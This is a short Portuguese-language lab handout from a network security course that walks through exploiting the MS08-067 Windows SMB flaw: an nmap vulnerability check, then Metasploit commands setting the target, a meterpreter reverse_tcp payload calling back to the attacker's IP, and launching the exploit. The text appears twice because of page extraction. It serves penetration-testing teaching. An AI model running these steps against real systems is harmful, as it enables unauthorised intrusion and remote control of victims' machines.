Unidade6 roteiro pentest

1
Curso Superior de Tecnologia em Redes de Computadores Segurança de Redes Prof. Leandro Almeida 1. Execute o nmap para verificar se o alvo é vulnerável (MS08-067) com o comando # nmap -v –script=smb-check-vulns IP_DO_ALVO 2. Em caso positivo, inicie o pentest com o Metasploit, utilizando o comando: # msfconsole 3. Escolha o exploit que irá explorar a vulnerabilidade msf> use exploit/windows/smb/ms08_067_netapi 4. Informe o IP do alvo msf exploit(ms08_067) > set RHOST IP_DO_ALVO 5. Escolha o payload(carga do exploit)     msf exploit(ms08_067) > set PAYLOAD  windows/meterpreter/reverse_tcp 6. Informe o IP do atacante msf exploit(ms08_067) > set LHOST IP_DO_ATACANTE 7. Execute o ataque msf exploit(ms08_067) > exploit 

Transcript of Unidade6 roteiro pentest

Page 1: Unidade6 roteiro pentest

Curso Superior de Tecnologia em Redes de ComputadoresSegurança de Redes

Prof. Leandro Almeida

1. Execute o nmap para verificar se o alvo é vulnerável (MS08-067) com o comando

# nmap ­v –script=smb­check­vulns IP_DO_ALVO

2. Em caso positivo, inicie o pentest com o Metasploit, utilizando o comando:

# msfconsole

3. Escolha o exploit que irá explorar a vulnerabilidade

msf> use exploit/windows/smb/ms08_067_netapi

4. Informe o IP do alvo

msf exploit(ms08_067) > set RHOST IP_DO_ALVO

5. Escolha o payload(carga do exploit)

    msf exploit(ms08_067) > set PAYLOAD  windows/meterpreter/reverse_tcp

6. Informe o IP do atacante

msf exploit(ms08_067) > set LHOST IP_DO_ATACANTE

7. Execute o ataque

msf exploit(ms08_067) > exploit